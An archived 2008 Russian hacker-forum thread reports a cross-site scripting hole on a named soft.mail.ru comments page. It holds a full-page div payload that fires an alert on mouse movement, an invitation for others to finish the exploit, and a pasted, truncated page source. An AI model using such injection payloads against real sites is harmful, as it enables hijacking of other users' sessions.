Добро пожаловать! Это — архивная версия форумов на «Хакер.Ru». Она работает в режиме read-only.
 
журналы новости статьи video форум подписка на «Хакер»

xss на mail.ru

Пользователи, просматривающие топик: none

Зашли как: Guest
Все форумы >> [Для начинающих] >> xss на mail.ru
Имя
Сообщение << Старые топики   Новые топики >>
xss на mail.ru - 2008-03-16 22:10:47.503333   
heaven7

Сообщений: 134
Оценки: 5
Присоединился: 2007-12-29 20:49:38.910000
 в поиске я особо не напрягался, кому надо доработают до победного конца

http://soft.mail.ru/program_comments.php?grp=44651
Post #: 1
RE: xss на mail.ru - 2008-03-16 23:45:12.083333   
blаcksun

Сообщений: 1670
Оценки: 0
Присоединился: 2007-11-19 20:03:45.703333
 <div onMouseMove='alert("alert")' style='height: 100%; width: 100%; background-color: #000000; color: #00FF00'>test</div>
Post #: 2
RE: xss на mail.ru - 2008-03-17 12:50:47.176666   
Taraseika

Сообщений: 98
Оценки: 0
Присоединился: 2007-09-07 19:32:59.486666
 Вот исходник страницы с XSS
&lt;html&gt; &lt;head&gt; &lt;title&gt;Софт@Mail.Ru: Active Photo Editor : Графические редакторы : Графика и дизайн&lt;/title&gt; &lt;link rel="icon" href="/favicon.ico" type="image/x-icon"&gt; &lt;link rel="shortcut icon" href="/favicon.ico" type="image/x-icon"&gt; &lt;meta name="description" content="Графический редактор с возможностью создания эффектов. Опции программы: - поддержка форматов: BMP, JPEG, GIF, PNG, ICO; - создание скриншотов экрана - применение различных эффектов к изображению - рисование линий и форм, заливка - устанавка цвета (кисти и холста); "&gt; &lt;meta name="keywords" content="графический редактор, работа с графикой, обработка фото, создание эффектов, фото эффекты, графика, фото, картинка"&gt; &lt;meta http-equiv="CONTENT-TYPE" content="text/html; charset=windows-1251"&gt; &lt;link rel="stylesheet" type="text/css" href="http://soft.mail.ru/css/index.css" title="CSS"&gt; &lt;/head&gt; &lt;body bgcolor=white leftmargin=0 rightmargin=0 topmargin=0 bottommargin=0 marginheight=0 marginwidth=0&gt; &lt;center&gt; &lt;!-- BEGIN:top --&gt; &lt;style&gt; table.top_menu td{font-size:80%;padding:2px 0px 4px 0px} table.top_menu td.bord_r{border-right:1px solid #C2C3CC} table.top_menu td.bord_l_or {border-left:1px solid #C2C3CC} table.top_menu td.bord_b {height:1px; padding:0px; background:#C2C3CC url('http://img.mail.ru/1.gif') no-repeat top right;} table.top_menu td.top_search {padding:0px 1px} table.top_menu td.top_search form {margin:0px} table.top_menu td.top_search td.top_search_logo {padding:0px} table.top_menu td.top_search td.top_search_inp {padding:0px; width:100%} table.top_menu td.top_search td.top_search_inp input {font-size:95%; width:99%; border:1px solid #9BA3A9; color:#5A5A5A;} table.top_menu td.top_search td.top_search_but {padding:1px 0 0 0} table.top_menu td.top_search td.top_search_but input {font-size:85%;width:55px;border:1px solid #9BA3A9; color:#5A5A5A; background:#FFF;} div#top_menu {height:18px;overflow:hidden; display:block; margin-top:2px;} div#top_menu a{height:16px;margin-top:0px;margin-right:0px;} div#top_menu img { margin-right:4px} &lt;/style&gt; &lt;script&gt; function inscript (input) { if (input.value=="") {input.value=' Поиск в Интернете'} } function ch() { document.MSearch.action="http://go.mail.ru/search" } &lt;/script&gt; &lt;table width=90% cellpadding=0 cellspacing=0 style="margin:0"&gt;&lt;td&gt; &lt;!--New project menu--&gt; &lt;table width=100% cellpadding=0 cellspacing=0 class=top_menu&gt; &lt;tr&gt; &lt;td class=bord_l_or&gt;&lt;img src=http://img.mail.ru/0.gif width=1 height=1&gt;&lt;/td&gt; &lt;td id=forGo class=top_search&gt;&lt;form action=http://go.mail.ru/ name=MSearch method="get" target="_blank"&gt;&lt;input type=hidden name=quick_form value="soft"&gt; &lt;table width=100% cellpadding=0 cellspacing=0 id="_rForm"&gt; &lt;td class=top_search_logo&gt;&lt;a href=http://go.mail.ru/ target=_blank&gt;&lt;img src=http://img.mail.ru/mail/ru/images/go-all.gif width=16 height=16 border=0&gt;&lt;/a&gt;&lt;/td&gt; &lt;td&gt;&lt;img src=http://img.mail.ru/0.gif width=3 height=1&gt;&lt;/td&gt; &lt;td class=top_search_inp&gt;&lt;img src=http://img.mail.ru/1.gif width=130 height=1&gt;&lt;br&gt; &lt;input type=text value="&nbsp;Поиск в Интернете" onkeyup="ch();" onfocus="this.value='';" onblur="inscript(this);" name=q&gt;&lt;/td&gt; &lt;td&gt;&lt;img src=http://img.mail.ru/0.gif width=2 height=1&gt;&lt;/td&gt; &lt;td class=top_search_but&gt;&lt;input type=submit value="Найти" style="height:18px"&gt;&lt;/td&gt; &lt;/table&gt;&lt;/form&gt; &lt;table width=100% cellpadding=0 cellspacing=0 style="display:none" id="_rLink"&gt; &lt;td width=5%&gt;&lt;img src=http://img.mail.ru/0.gif width=15 height=1&gt;&lt;/td&gt; &lt;td nowrap&gt;&lt;a href=http://go.mail.ru/&gt;&lt;img src=http://img.mail.ru/mail/ru/images/go-all.gif width=16 height=16 alt="Поиск" border=0 align=absmiddle&gt;&lt;/a&gt;&nbsp;&lt;a href=http://go.mail.ru/&gt;Поиск&lt;/a&gt;&lt;/td&gt; &lt;/table&gt; &lt;/td&gt; &lt;td&gt;&lt;img src=http://img.mail.ru/0.gif width=15 height=1&gt;&lt;/td&gt; &lt;script type="text/javascript"&gt; var projectIconPath = "http://img.mail.ru/mail/ru/images/"; var allProjectsArray = [ ["Почта", "http://mail.ru/", "mail-all.gif"], ["Агент", "http://agent.mail.ru/", "agent4-all.gif"], ["Каталог", "http://list.mail.ru/", "list-all.gif"], ["Новости", "http://news.mail.ru/", "news-all.gif"], ["Товары", "http://r.mail.ru/cln3339/torg.mail.ru/", "torg-all.gif"], ["Рейтинг", "http://top.mail.ru/", "top-all.gif"], ["Рассылки", "http://content.mail.ru/", "content-all.gif"], ["Обучение", "http://education.mail.ru/", "edu-all.gif"], ["Товары", "http://r.mail.ru/cln3339/torg.mail.ru/", "torg-all.gif"], ["Авто", "http://auto.mail.ru/", "cars-all.gif"], ["ТВ", "http://tv.mail.ru/", "tv-all.gif"], ["Погода", "http://weather.mail.ru/", "weather-all.gif"], ["Путешествия", "http://travel.mail.ru/", "tour-all.gif"], ["Карты", "http://map.mail.ru/msk/", "map-all.gif"] ]; var projectsHtmlContent = ""; for (i = 0; i &lt; allProjectsArray.length; i++) { projectsHtmlContent += "&lt;a href=" + allProjectsArray[i][1] + "&gt;&lt;img src=" + projectIconPath + allProjectsArray[i][2] + " width=16 height=16 alt=\"" + allProjectsArray[i][0] + "\" border=0 align=absmiddle&gt;" + allProjectsArray[i][0] + "&lt;/a&gt;"; } document.write("\ &lt;td width=\"100%\"&gt;\ &lt;div id=top_menu&gt;" + projectsHtmlContent + "&lt;/div&gt;\ &lt;/td&gt;\ "); &lt;/script&gt; &lt;noscript&gt; &lt;td nowrap&gt;&lt;a href=http://mail.ru/ target=_blank&gt;&lt;img src=http://img.mail.ru/mail/ru/images/mail-all.gif width=16 height=16 alt="Почта" border=0 align=absmiddle&gt;&lt;/a&gt;&nbsp;&lt;a href=http://mail.ru/ target=_blank&gt;Почта&lt;/a&gt;&lt;/td&gt; &lt;td width=5%&gt;&lt;img src=http://img.mail.ru/0.gif width=7 height=1&gt;&lt;/td&gt; &lt;td nowrap&gt;&lt;a href=http://agent.mail.ru/ target=_blank&gt;&lt;img src=http://img.mail.ru/mail/ru/images/agent4-all.gif width=16 height=16 alt="Агент" border=0 align=absmiddle&gt;&lt;/a&gt;&nbsp;&lt;a href=http://agent.mail.ru target=_blank&gt;Агент&lt;/a&gt;&lt;/td&gt; &lt;td width=5%&gt;&lt;img src=http://img.mail.ru/0.gif width=7 height=1&gt;&lt;/td&gt; &lt;td nowrap&gt;&lt;a href=http://list.mail.ru/ target=_blank&gt;&lt;img src=http://img.mail.ru/ru/images/list-all.gif width=16 height=16 alt="Каталог" border=0 align=absmiddle&gt;&lt;/a&gt;&nbsp;&lt;a href=http://list.mail.ru target=_blank&gt;Каталог&lt;/a&gt;&lt;/td&gt; &lt;td width=5%&gt;&lt;img src=http://img.mail.ru/0.gif width=7 height=1&gt;&lt;/td&gt; &lt;td nowrap&gt;&lt;a href=http://news.mail.ru/ target=_blank&gt;&lt;img src=http://img.mail.ru/mail/ru/images/news-all.gif width=16 height=16 alt="Новости" border=0 align=absmiddle&gt;&lt;/a&gt;&nbsp;&lt;a href=http://news.mail.ru/ target=_blank&gt;Новости&lt;/a&gt;&lt;/td&gt; &lt;td width=5%&gt;&lt;img src=http://img.mail.ru/0.gif width=7 height=1&gt;&lt;/td&gt; &lt;td nowrap&gt;&lt;a href=http://money.mail.ru/ target=_blank&gt;&lt;img src=http://img.mail.ru/mail/ru/images/money-all.gif width=16 height=16 alt="Деньги" border=0 align=absmiddle&gt;&lt;/a&gt;&nbsp;&lt;a href=http://money.mail.ru/ target=_blank&gt;Деньги&lt;/a&gt;&lt;/td&gt; &lt;td width=5%&gt;&lt;img src=http://img.mail.ru/0.gif width=7 height=1&gt;&lt;/td&gt; &lt;td nowrap&gt;&lt;a href=http://content.mail.ru/ target=_blank&gt;&lt;img src=http://img.mail.ru/mail/ru/images/content-all.gif width=16 height=16 alt="Рассылки" border=0 align=absmiddle&gt;&lt;/a&gt;&nbsp;&lt;a href=http://content.mail.ru/ target=_blank&gt;Рассылки&lt;/a&gt;&lt;/td&gt; &lt;td width=5%&gt;&lt;img src=http://img.mail.ru/0.gif width=7 height=1&gt;&lt;/td&gt; &lt;/noscript&gt; &lt;td nowrap id="forAll"&gt;&lt;img src=http://img.mail.ru/0.gif width=5 height=1&gt;&lt;a href=http://r.mail.ru/cln2767/mail.ru/all/&gt;&lt;b&gt;Все проекты&lt;/b&gt;&lt;/a&gt;&lt;/td&gt; &lt;td class=bord_r&gt;&lt;img src=http://img.mail.ru/0.gif width=10 height=1&gt;&lt;/td&gt; &lt;/tr&gt; &lt;tr&gt;&lt;td colspan=99 class=bord_b nowrap&gt;&lt;img src=http://img.mail.ru/1.gif width=1 height=1&gt;&lt;/td&gt;&lt;/tr&gt; &lt;/table&gt; &lt;!--/New project menu--&gt; &lt;img src=http://img.mail.ru/1.gif width=760 height=1&gt;&lt;br&gt; &lt;/td&gt;&lt;/table&gt; &lt;table width=90% cellpadding=0 cellspacing=0 id=demetion style="margin:0"&gt;&lt;td&gt;&lt;img src=http://img.mail.ru/1.gif width=760 height=1&gt;&lt;/td&gt;&lt;/table&gt; &lt;script type="text/javascript"&gt; var cashProjectWidth = new Array(); function menu_resize () { var body90Width = document.getElementById("demetion").offsetWidth; var bodyWidth = (window.innerWidth) ? window.innerWidth : window.document.body.clientWidth; if (bodyWidth &lt; 800) { document.getElementById("_rForm").style.display = "none"; document.getElementById("_rLink").style.display = ""; } else { document.getElementById("_rForm").style.display = ""; document.getElementById("_rLink").style.display = "none"; } var searchTd = document.getElementById("forGo").offsetWidth; var allTd = document.getElementById("forAll").offsetWidth; var menu = document.getElementById("top_menu"); var menu_width = body90Width - searchTd - allTd - 25; document.getElementById("top_menu").style.width = menu_width; var projectCount = menu.childNodes.length; var marginMinWidth = 10; if (bodyWidth &lt; 1250) marginMinWidth = 10; else marginMinWidth = 20; if (cashProjectWidth.length == 0) { for(i = 0; i &lt; projectCount; i++) { cashProjectWidth[i] = menu.childNodes[i].offsetWidth; } } var show_points = 0; for(i = 0; i &lt; projectCount; i++) { if (menu_width &gt;= show_points + cashProjectWidth[i] + marginMinWidth) { show_points += cashProjectWidth[i] + marginMinWidth; } else break; } var show_count = i; var delta = menu_width - show_points + (show_count + 1)*marginMinWidth; for(i = 0; i &lt; projectCount; i++) { if (i &lt; show_count) { menu.childNodes[i].style.display = ""; menu.childNodes[i].style.marginRight = delta/(show_count + 1); } else { menu.childNodes[i].style.display = "none"; menu.childNodes[i].style.marginRight = 0; } } } menu_resize (); window.onload = menu_resize; window.onresize = menu_resize; &lt;/script&gt; &lt;table height=1 cellspacing=0 cellpadding=0 style="margin-bottom:7px"&gt; &lt;td&gt;&lt;!--TopList COUNTER--&gt;&lt;script language="JavaScript"&gt;&lt;!-- d=document;a='';a+=';r='+escape(d.referrer) js=10//--&gt;&lt;/script&gt;&lt;script language="JavaScript1.1"&gt;&lt;!-- a+=';j='+navigator.javaEnabled() js=11//--&gt;&lt;/script&gt;&lt;script language="JavaScript1.2"&gt;&lt;!-- s=screen;a+=';s='+s.width+'*'+s.height a+=';d='+(s.colorDepth?s.colorDepth:s.pixelDepth) js=12//--&gt;&lt;/script&gt;&lt;script language="JavaScript1.3"&gt;&lt;!-- js=13//--&gt;&lt;/script&gt;&lt;script language="JavaScript"&gt;&lt;!-- d.write('&lt;img src="http://top.list.ru/counter'+ '?id=2361;js='+js+a+';rand='+Math.random()+ '" height=1 width=1&gt;') if(js&gt;11)d.write('&lt;'+'!-- ')//--&gt;&lt;/script&gt;&lt;noscript&gt;&lt;img src="http://img.mail.ru/r/dumb.gif" height=1 width=1 &gt;&lt;/noscript&gt;&lt;script language="JavaScript"&gt;&lt;!-- if(js&gt;11)d.write('--'+'&gt;')//--&gt;&lt;/script&gt;&lt;!--TopList COUNTER--&gt;&lt;img src=http://www.tns-counter.ru/V13a****mail_ru/ru/CP1251/tmsec=mail_soft/ width=1 height=1&gt;&lt;/td&gt;&lt;/table&gt;&lt;!-- END:top --&gt; &lt;!--Banner - begin--&gt; &lt;table cellpadding=0 cellspacing=0 border=0 width=90% align="center" &gt; &lt;td align="center"&gt; &lt;!--слоты верхней шапки--&gt; &lt;table border=0 cellspacing=0 cellpadding=0 width=100%&gt; &lt;tr&gt;&lt;TD width=100% ALIGN="center" class="t"&gt;&lt;img src="http://counter.rambler.ru/top100.cnt?292314" alt="Rambler's Top100" width="1" height="1" border=0&gt;&lt;/TD&gt;&lt;/tr&gt; &lt;/table&gt; &lt;/td&gt; &lt;/tr&gt; &lt;/table&gt; &lt;!--Banner - end--&gt; &lt;!--header - end--&gt; &lt;!--Main Part - begin--&gt; &lt;!-- search - begin--&gt; &lt;table cellpadding=0 cellspacing=0 border=0 width=90% align="center" id="searchcont"&gt; &lt;tr&gt; &lt;td width=100% class=header&gt; &lt;!--&lt;td width=100% class=header style="background:#00468C url('http://soft.mail.ru/img/ny_bg.gif') no-repeat top left"&gt;--&gt; &lt;table cellpadding=0 cellspacing=0 border=0 width=100% height=57 id="poisk"&gt; &lt;tr&gt; &lt;td style="width:1px; background:url(/img/spacerwhite.gif) no-repeat bottom; vertical-align:top"&gt;&lt;img src="/img/spacerwhite.gif" style="width:1px; height:1px"&gt;&lt;/td&gt; &lt;td height=57 class=head&gt; &lt;a href="http://soft.mail.ru"&gt;&lt;img src="http://img.soft.mail.ru/soft/img/soft_mail.gif" border=0 width=55 height=20 alt=Софт@Mail.Ru&gt;&lt;/a&gt;&lt;a href="http://mail.ru"&gt;&lt;img src="http://img.soft.mail.ru/soft/img/mail.gif" border=0 width=103 height=20 alt=Mail.ru&gt;&lt;/a&gt;&lt;img src="http://img.soft.mail.ru/soft/img/0.gif" width=20 height=20&gt; &lt;/td&gt; &lt;!--&lt;td height=57 class=head&gt;&lt;a href="http://soft.mail.ru"&gt;&lt;img src="http://img.soft.mail.ru/soft/img/ny_soft_mail.gif" border=0 width=55 height=57 alt=Софт@Mail.Ru&gt;&lt;/a&gt;&lt;a href="http://mail.ru"&gt;&lt;img src="http://img.soft.mail.ru/soft/img/ny_mail.gif" border=0 width=123 height=57 alt=Mail.ru&gt;&lt;/a&gt;&lt;img src="http://img.soft.mail.ru/soft/img/0.gif" width=20 height=20&gt;&lt;/td&gt;--&gt; &lt;form onSubmit="return CheckQ(this);" name="MSearch_" action="http://soft.mail.ru/search_result_header.php"&gt; &lt;input name="qs" value="1" type="hidden"&gt; &lt;td align="center" width="100%"&gt; &lt;table cellpadding=0 cellspacing=0 border=0 width="100%"&gt; &lt;INPUT name=qs type=hidden value=1&gt; &lt;tr valign="top"&gt; &lt;td align="right" height="18" valign="middle"&gt;&lt;a href="http://mail.ru/kb/" onClick="document.domain='mail.ru'; window.open('http://mail.ru/kb/index.html?form=MSearch_&text=q_&keymode=2&savemode=0', 'keyb', 'height=360,width=610,toolbar=no,menubar=no,location=no,scrollbars=no,focus=yes,top=50,left=50'); return false;"&gt;&lt;img src="http://img.go.mail.ru/search_s_keyb.gif" border="0" height="13" width="14" vspace="2" align="top" alt=""&gt;&lt;/a&gt;&nbsp;&lt;/td&gt; &lt;td colspan="2"&gt;&nbsp;&lt;/td&gt; &lt;td rowspan="2" align="right" valign="top" nowrap="nowrap" class="white"&gt; &lt;div align="right" style="width:9px;"&gt;&lt;/div&gt; &lt;/td&gt; &lt;/tr&gt; &lt;tr valign=middle&gt; &lt;td class=bg1 width=100% style="padding-left:63px"&gt; &lt;img src="http://img.soft.mail.ru/soft/img/0.gif" width=1 height=3&gt;&lt;br&gt; &lt;input type=text style="width:100%" class=long name=q_ value="" id="q_"&gt;&lt;/td&gt; &lt;td class=bg1&gt;&lt;img src="http://img.mail.ru/r/dumb.gif" width=10 border=0 height=1 &gt;&lt;/td&gt; &lt;td class=bg1&gt;&lt;img src="http://img.soft.mail.ru/soft/img/0.gif" width=1 height=3&gt;&lt;br&gt;&lt;input type="submit" value=" Найти "&gt;&lt;/td&gt; &lt;/tr&gt; &lt;tr valign=middle&gt; &lt;td class=bg1 width=100% colspan=3&gt; &lt;img src="http://img.soft.mail.ru/soft/img/0.gif" width=1 height=8&gt;&lt;br&gt; &lt;/td&gt; &lt;/tr&gt; &lt;/table&gt; &lt;/td&gt; &lt;/form&gt; &lt;script language="javascript" type="text/javascript"&gt; &lt;!-- document.getElementById('q_').focus(); //--&gt; &lt;/script&gt; &lt;td style="padding:5px 0 0 20px" valign="top" align="right"&gt; &lt;table cellspacing="0" cellpadding="0" border="0"&gt; &lt;tr&gt; &lt;td align="center" colspan="2" style="padding:3px 10px 0px 0px"&gt;&lt;a href="http://www.softline.ru"&gt;&lt;img src="http://img.mail.ru/r/dumb.gif" width=10 border=0 height=1 &gt;&lt;img src="http://img.soft.mail.ru/soft/img/softline.gif" border=0 width=130 height=38 alt="Softline - программное обеспечение"&gt;&lt;/a&gt;&lt;/td&gt; &lt;/tr&gt; &lt;/table&gt; &lt;/td&gt; &lt;td style="width:1px; background:url(/img/spacerwhite.gif) no-repeat bottom; vertical-align:top"&gt;&lt;img src="/img/spacerwhite.gif" style="width:1px; height:1px"&gt;&lt;/td&gt; &lt;/tr&gt; &lt;/table&gt; &lt;table cellspacing="0" cellpadding="0" border="0" width="100%"&gt; &lt;tr&gt; &lt;td align="left" bgcolor="#ffffff" style="padding-left:260px" id="parentZaklId" &gt; &lt;style&gt; /* все потроха для переключаемых табов под строкой поиска */ td.current div.left {background:#004B88 no-repeat url('http://img.mail.ru/1.gif') bottom left; padding-left:1px;} td.current div.right {background:no-repeat url('http://img.mail.ru/1.gif') bottom right; padding-right:1px;} td.current div.center{border-bottom:1px solid #004B88; padding:1px 9px 3px 9px; background-color:#004B88; color:#000000;} td.current div.center a{color:#FFFFFF; font-weight:bold; text-decoration:none;cursor:default;} td.current div.center a:hover{color:#FFFFFF; text-decoration:none;cursor:default;} td.common div.left {background:#8098AD no-repeat url('http://img.mail.ru/1.gif') bottom left; padding-left:1px;} td.common div.right {background:no-repeat url('http://img.mail.ru/1.gif') bottom right; padding-right:1px;} td.common div.center{border-bottom:1px solid #8098AD; padding:1px 9px 3px 9px; background-color:#FFFFFF; color:#000000;} td.common div.center a{color:#000000; text-decoration:none;} td.common div.center a:hover{color:#000000; text-decoration:underline;} table#allMarkTable td.otv2{padding:2px 7px 2px 0} table#allMarkTable td.otv2 a{color:#0855A5; text-decoration:underline} table#allMarkTable td.otv2 a:visited{color:#0855A5; text-decoration:underline} table#allMarkTable td.otv2 a:hover{color:#F26D00; text-decoration:underline} table#allMarkTable td.otv1{padding:2px 4px 0 5px} td.current,td.common {font-size:80%;font-family:arial} &lt;/style&gt; &lt;!--style=" BEGIN: new bookmarks --&gt; &lt;table cellpadding=0 cellspacing=0 border=0 align="left" id=allMarkTable &gt; &lt;tr&gt; &lt;td id=bookmark_1 class=common&gt;&lt;div class=left&gt;&lt;div class=right&gt;&lt;div class=center&gt;&lt;a id=int_href href="http://go.mail.ru/search?q=" onClick="return bookmarkClick(this);"&gt;Интернет&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/td&gt; &lt;td width=5&gt;&lt;img src=http://img.go.mail.ru/d.gif width=5 height=1&gt;&lt;/td&gt; &lt;td id=bookmark_2 class=common&gt;&lt;div class=left&gt;&lt;div class=right&gt;&lt;div class=center&gt;&lt;a id=pic_href href="http://go.mail.ru/search_images?q=" onClick="return bookmarkClick(this);"&gt;Картинки&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/td&gt; &lt;td width=5&gt;&lt;img src=http://img.go.mail.ru/d.gif width=5 height=1&gt;&lt;/td&gt; &lt;td id=bookmark_3 class=common&gt;&lt;div class=left&gt;&lt;div class=right&gt;&lt;div class=center&gt;&lt;a id=video_href href="http://go.mail.ru/search_video?q=" onClick="return bookmarkClick(this);"&gt;Видео&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/td&gt; &lt;td width=5&gt;&lt;img src=http://img.go.mail.ru/d.gif width=5 height=1&gt;&lt;/td&gt; &lt;td id=bookmark_4 class=common&gt;&lt;div class=left&gt;&lt;div class=right&gt;&lt;div class=center&gt;&lt;a id=otvet_href href="http://go.mail.ru/otvet?q=" onClick="return bookmarkClick(this);"&gt;Ответы&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/td&gt; &lt;td width=5&gt;&lt;img src=http://img.go.mail.ru/d.gif width=5 height=1&gt;&lt;/td&gt; &lt;td id=bookmark_5 class=common&gt;&lt;div class=left&gt;&lt;div class=right&gt;&lt;div class=center&gt;&lt;a id=cat_href href="http://search.list.mail.ru/?q=" onClick="return bookmarkClick(this);"&gt;Каталог&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/td&gt; &lt;td width=5&gt;&lt;img src=http://img.go.mail.ru/d.gif width=5 height=1&gt;&lt;/td&gt; &lt;td id=bookmark_6 class=common&gt;&lt;div class=left&gt;&lt;div class=right&gt;&lt;div class=center&gt;&lt;a id=lot_href href="http://search.tovary.mail.ru/?q=" onClick="return bookmarkClick(this);"&gt;Товары&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/td&gt; &lt;td width=5&gt;&lt;img src=http://img.go.mail.ru/d.gif width=5 height=1&gt;&lt;/td&gt; &lt;td id=bookmark_7 class=current&gt;&lt;div class=left&gt;&lt;div class=right&gt;&lt;div class=center&gt;&lt;a id=soft_href href="http://soft.mail.ru/search_result_header.php?searchstring=" onClick="return bookmarkClick(this);"&gt;Софт&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/td&gt; &lt;td width=5&gt;&lt;img src=http://img.go.mail.ru/d.gif width=5 height=1&gt;&lt;/td&gt; &lt;td id=bookmark_8 class=common&gt;&lt;div class=left&gt;&lt;div class=right&gt;&lt;div class=center&gt;&lt;a id=dict_href href="http://multilex.mail.ru/view_dict?lang=4.0er&dict=1common&dict=ComE&dict=Ecn&dict=Fedorov&dict=JurE&dict=MedE&dict=PublE&dict=SocE&dict=StrE&dict=SunE&dict=2common&dict=JurR&dict=MedR&dict=OilR&dict=PhysR&dict=PltR&dict=SunR&selall=on&winword=" onClick="return bookmarkClick(this);"&gt;Словари&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/td&gt; &lt;td width=5&gt;&lt;img src=0.gif width=5 height=1&gt;&lt;/td&gt; &lt;td id=bookmark_9 class=common style="display:none"&gt;&lt;div class=left&gt;&lt;div class=right&gt;&lt;div class=center&gt;&lt;a id=enc_href href=http://r.mail.ru/cln3226/search.enc.mail.ru/search_enc?q= onClick="return bookmarkClick(this);"&gt;Энциклопедии&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/td&gt; &lt;td width=5&gt;&lt;img src=0.gif width=5 height=1&gt;&lt;/td&gt; &lt;td id=bookmark_10 class=common style="display:none"&gt;&lt;div class=left&gt;&lt;div class=right&gt;&lt;div class=center&gt;&lt;a id=map_href href="http://r.mail.ru/cln3329/map.mail.ru/msk/addr.asp?mask=" onClick="return bookmarkClick(this);"&gt;Карты&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/td&gt; &lt;/tr&gt;&lt;/table&gt; &lt;/td&gt; &lt;/tr&gt; &lt;/table&gt; &lt;!-- END: new bookmarks --&gt; &lt;script type="text/javascript"&gt; &lt;!-- var globalLink = document.getElementById('soft_href'); /* парсим query_string и подсвечиваем таб */ tab = { web:'bookmark_1', images:'bookmark_2', video:'bookmark_3', otvet:'bookmark_4', list:'bookmark_5', torg:'bookmark_6', soft:'bookmark_7', dict:'bookmark_8',enc:'bookmark_9',maps:'bookmark_10'} dest = {web:'int_href', images:'pic_href', video:'video_href', otvet:'otvet_href', list:'cat_href', torg:'lot_href', soft:'soft_href', dict:'dict_href',enc:'enc_href',maps:'map_href'} function Querystring(qs) { this.params = new Object() this.get=Querystring_get if (qs == null) qs=location.search.substring(1,location.search.length); if (qs.length == 0) return // Turn &lt;plus&gt; back to &lt;space&gt; qs = qs.replace(/\+/g, ' ') var args = qs.split('&') // parse out name/value pairs separated via & // разбираем пары name=value for (var i=0;i&lt;args.length;i++) { var value; var pair = args[i].split('=') var name = unescape(pair[0]) if (pair.length == 2) value = unescape(pair[1]) else value = name; this.params[name] = value; //alert ('name '+ name + ', value ' + value); //если таб есть, но он пустой, отмечаем "интернет" if (name == 'tab' && value == '') { document.getElementById('bookmark_7').className = 'current'; //если таб есть и он не пустой и td с таким id есть } else if (name == 'tab' && value != '' && document.getElementById(tab[value])) { // помечаем интернет обычным классом и т.д. document.getElementById('bookmark_1').className = 'common'; document.getElementById(tab[value]).className = 'current'; globalLink = document.getElementById(dest[value]); //alert ('Querystring(), globalLink is ' + globalLink); // } else if (name == 'tab' && value != '' && !document.getElementById(tab[value])){ // globalLink = document.getElementById('int_href'); } } } // вспомогательная фишка для парсинга query_string function Querystring_get(key, default_) { // This silly looking line changes UNDEFINED to NULL if (default_ == null) default_ = null; var value=this.params[key] if (value==null) value=default_; return value } Querystring(); /* -------------------------------------------------------------- */ // формируем строку запроса function set_query(oElem) { oElem.href += document.MSearch.q.value; oElem.href=oElem.href.replace(/\+/g,"%2B"); } // при сабмите function CheckQ(oForm) { var requezd = document.getElementById("q_").value.replace(/\+/g,"%2B"); if (typeof(globalLink) == "undefined"){ globalLink = document.getElementById('soft_href'); } //alert ('begin CheckQ, globalLink is -&gt; ' + globalLink);/ if (oForm.q_.value.length != 0) { var sLink = globalLink + requezd; document.location.href = sLink; } // set_query(globalLink); // alert ('set_query.href = ' + globalLink.href); return false; }; /* -------------------------------------------------------------- */ //var globalLink = document.getElementById("int_href"); function bookmarkClick(_a) { requezd = document.getElementById('q_').value.replace(/\+/g,"%2B"); globalLink = _a; // alert ("_a = " + _a + "\n requezd =&gt; " + requezd + "\n requezd.length = " + requezd.length); if (requezd.length &gt; 0) { // alert ("requezd.length &gt; 0"); //set_query(_a); _a.href = _a + requezd; } else { // alert ("bookmarkClick ELSE"); var _td = _a.parentNode.parentNode.parentNode.parentNode; var count = 1; while (document.getElementById("bookmark_" + count)) { if (document.getElementById("bookmark_" + count) == _td) document.getElementById("bookmark_" + count).className = "current"; else document.getElementById("bookmark_" + count).className = "common"; count++; } return false; } } // --&gt; &lt;/script&gt; &lt;script type="text/javascript"&gt; var ns4=document.layers?1:0; var ie4=document.all?1:0; var ns6=document.getElementById&&!document.all?1:0; var opera = false; if (navigator.appName == "Opera") { var opera = true; } // показываем/прячем табы //var allMarkWidth = document.getElementById("allMarkTable").offsetWidth; function showHideMark() { var curWidth = document.getElementById("parentZaklId").offsetWidth; //if (ie4) curWidth += 130; //document.MSearch_.q_.value = curWidth; var minWidth = 1050; // Enc при 1024 есть //document.MSearch.q.value = minWidth; document.getElementById("bookmark_9").style.display = (curWidth &gt; minWidth) ? "" : "none"; minWidth += 27; // Maps при 1280 появлятся карты document.getElementById("bookmark_10").style.display = (curWidth &gt; minWidth) ? "" : "none"; } //showHideMark(); window.onload = showHideMark; window.onresize = showHideMark; &lt;/script&gt; &lt;/td&gt; &lt;/tr&gt; &lt;tr&gt;&lt;td&gt; &lt;img src="http://img.soft.mail.ru/soft/img/0.gif" width=760 height=1&gt;&lt;br&gt; &lt;/td&gt; &lt;/tr&gt; &lt;/table&gt; &lt;!-- search - end--&gt;&lt;!--Навигация Soft.Mail.ru- начало--&gt; &lt;script language="JavaScript"&gt;&lt;!-- function cl(link) { img = new Image(); img.src = 'http://www.liveinternet.ru/click?*' + link; } //--&gt;&lt;/script&gt; &lt;table cellpadding="0" cellspacing="0" border="0" width="90%"&gt; &lt;tr&gt; &lt;td&gt; &lt;table cellspacing="0" cellpadding="0" border="0"&gt; &lt;tr&gt; &lt;td class="mp2" style="border-top:1px solid #d9d9d9"&gt; &lt;table cellpadding="0" cellspacing="0" border="0" align="center" style="margin-top:1px"&gt; &lt;tr&gt; &lt;td class="cat" nowrap&gt;&lt;a href="/catalogue.php" style="text-decoration:none"&gt;&lt;img src="http://img.soft.mail.ru/soft/img/catalogue.gif" width="16" height="16" border="0" alt="Каталог софта" style="margin-right:6px" align="absmiddle"&gt;&lt;h1 style="display:inline"&gt;КАТАЛОГ&lt;/h1&gt;&lt;/a&gt;&lt;/td&gt; &lt;/tr&gt; &lt;/table&gt; &lt;/td&gt; &lt;td class="m" style="border-bottom:1px solid #d9d9d9" 